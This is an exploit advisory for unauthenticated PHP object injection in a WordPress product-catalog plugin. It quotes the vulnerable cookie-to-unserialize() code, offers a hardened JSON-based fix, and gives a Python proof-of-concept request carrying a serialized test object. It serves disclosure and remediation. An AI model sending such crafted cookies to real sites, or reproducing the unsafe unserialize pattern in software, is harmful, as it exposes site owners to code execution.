WordPress Plugin Ultimate Product Catalog 4.2.24 – PHP Object Injection

Author: tomplixsee
Date: 2017-10-30
Source: https://www.exploit-db.com/exploits/43065/
# Exploit Title: [WP Plugin Ultimate Product Catalog 4.2.24 PHP Object Injection]
# Google Dork: [NA]
# Date: [Oct 30 2017]
# Exploit Author: [tomplixsee]
# Author blog : [cupuzone.wordpress.com]
# Vendor Homepage: [http://www.etoilewebdesign.com/plugins/ultimate-product-catalog/]
# Software Link: [https://wordpress.org/plugins/ultimate-product-catalogue/]
# Version: [<= 4.2.24]
# Tested on: [Ubuntu Server 16.04]
# CVE : [NA]
    
Tested on plugin versions 4.2.23 and 4.2.24.

A crafted upcp_cart_products cookie reaches unserialize() in the vulnerable function. No login is required, because the handler is also registered on the wp_ajax_nopriv_ hook.

1. Vulnerable code in Functions/Process_Ajax.php, lines 203-229 (tested):
    
// Adds an item to the plugin's cart
function UPCP_Add_To_Cart() {
    global $woocommerce;
    global $wpdb;
    global $items_table_name;

    $WooCommerce_Checkout = get_option("UPCP_WooCommerce_Checkout");

    if ($WooCommerce_Checkout == "Yes") {
        $WC_Prod_ID = $wpdb->get_var($wpdb->prepare("SELECT Item_WC_ID FROM $items_table_name WHERE Item_ID=%d", sanitize_text_field($_POST['prod_ID'])));
        echo "WC ID: " . $WC_Prod_ID . "<Br>";
        $woocommerce->cart->add_to_cart($WC_Prod_ID);
    }

    // Attacker-controlled cookie value is passed straight to unserialize()
    if (isset($_COOKIE['upcp_cart_products'])) {
        $Products_Array = unserialize(str_replace('\"', '"', $_COOKIE['upcp_cart_products']));
    }
    else {
        $Products_Array = array();
    }

    $Products_Array[] = $_POST['prod_ID'];
    $Products_Array = array_unique($Products_Array);
    setcookie('upcp_cart_products', serialize($Products_Array), time()+3600*24*3, "/");
}
add_action('wp_ajax_upcp_add_to_cart', 'UPCP_Add_To_Cart');
// nopriv hook: the handler is reachable without authentication
add_action( 'wp_ajax_nopriv_upcp_add_to_cart', 'UPCP_Add_To_Cart' );
    
2. Vulnerable code in Functions/Shortcodes.php (not tested).
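For reference, a hardened version of the cookie handling shown above, written as an added example and not taken from the plugin. The cookie name upcp_cart_products and the prod_ID field come from the advisory; upcp_read_cart_legacy(), upcp_read_cart() and upcp_add_to_cart_safe() are hypothetical names chosen here.

```php
<?php
// Added example (not the plugin's code): hardened replacement for the
// cookie handling in UPCP_Add_To_Cart().

// Minimal patch if the serialized cookie format must be kept (PHP >= 7.0):
// with allowed_classes => false every O:...:{} token is turned into a
// __PHP_Incomplete_Class, so no __wakeup()/__destruct() gadget can run.
// Entries should still be validated as integers, as upcp_read_cart() does.
function upcp_read_cart_legacy(string $raw): array {
    $data = @unserialize(stripslashes($raw), array('allowed_classes' => false));
    return is_array($data) ? $data : array();
}

// Preferred fix: store the cart as JSON. json_decode() can only yield
// scalars and arrays, so a crafted cookie cannot instantiate objects at all.
function upcp_read_cart(): array {
    if (!isset($_COOKIE['upcp_cart_products'])) {
        return array();
    }
    // WordPress slash-escapes $_COOKIE (wp_magic_quotes), hence stripslashes().
    $decoded = json_decode(stripslashes($_COOKIE['upcp_cart_products']), true);
    if (!is_array($decoded)) {
        return array();   // malformed or legacy cookie: start with an empty cart
    }
    $ids = array();
    foreach ($decoded as $value) {
        $id = absint($value);          // WordPress helper: coerce to int >= 0
        if ($id > 0) {
            $ids[$id] = $id;           // keyed by ID, so duplicates collapse
        }
    }
    return array_values($ids);
}

function upcp_add_to_cart_safe() {
    $ids = upcp_read_cart();
    $new = absint($_POST['prod_ID'] ?? 0);
    if ($new > 0 && !in_array($new, $ids, true)) {
        $ids[] = $new;
    }
    // Same path and 3-day lifetime as the original; Secure (when served over
    // TLS) and HttpOnly flags added so scripts cannot read or forge the cart.
    setcookie('upcp_cart_products', json_encode($ids), time() + 3600 * 24 * 3,
              '/', '', is_ssl(), true);
}
```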
    
POC
1. Use a WP plugin for testing PHP object injection,
   e.g. https://www.pluginvulnerabilities.com/2017/07/24/wordpress-plugin-for-use-in-testing-for-php-object-injection/
    
2. Make a request:
#-----------------------------------
#! /usr/bin/python
import requests

# Test host from the original advisory; the cookie carries the serialized
# test object recognised by the plugin from step 1.
url = "http://vbox-ubuntu-server.me/wordpress/wp-admin/admin-ajax.php?"
data = {'action': 'upcp_add_to_cart'}
headers = {
    'Content-type': 'application/x-www-form-urlencoded',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
    'Cookie': 'upcp_cart_products=O:20:"PHP_Object_Injection":0:{}'
}
r = requests.post(url, data=data, headers=headers)

print(r.content)

#------------------------------------